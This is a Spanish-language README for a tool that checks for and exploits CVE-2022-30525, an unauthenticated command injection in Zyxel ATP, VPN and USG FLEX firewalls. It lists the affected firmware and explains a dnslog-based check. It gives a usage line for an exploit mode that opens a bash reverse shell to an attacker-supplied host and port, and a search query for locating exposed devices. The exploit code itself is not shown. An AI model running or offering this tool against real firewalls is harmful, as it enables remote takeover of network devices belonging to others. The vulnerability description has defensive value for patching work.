
CVE-2022-30525 Vulnerabilidad de inyección de comandos en firewall Zyxel POC&EXPC
CVE-2022-30525 POC&EXP
autor:160team.west9B
Solo para uso de investigadores de seguridad debidamente autorizados. Cumpla con la Ley de Ciberseguridad. Cualquier problema que surja es responsabilidad del usuario, no del autor.
El 12 de mayo de 2022, Zyxel publicó un aviso de seguridad para corregir una vulnerabilidad de inyección remota de comandos no autenticada (CVE-2022-30525) en sus dispositivos de firewall, con una puntuación CVSS de 9.8. La vulnerabilidad reside en el programa CGI de ciertas versiones de los firewalls Zyxel y permite ejecutar comandos arbitrarios en los dispositivos afectados sin autenticación.
Alcance afectado:
Firmware de la serie ATP: 5.10-5.21 Patch 1
Firmware de la serie VPN: 4.60-5.21 Patch 1
USG FLEX 100(W), 200, 500, 700: 5.00-5.21 Patch 1
USG FLEX 50(W)/USG20(W)-VPN: 5.10-5.21 Patch 1
La ejecución de comandos de esta vulnerabilidad no tiene eco, por lo que el POC solicita la API de dnslog para verificar la vulnerabilidad; si dnslog recibe la solicitud, la vulnerabilidad existe. Para evitar falsos positivos debidos a la latencia de la red, la verificación de DNSLOG retrasa la solicitud 10 segundos.
usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/
El EXP realiza una reverse shell de bash. Después de -m exp, especifique la IP y el puerto del VPS.
**usage_exp:./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337 **

title="USG FLEX xx"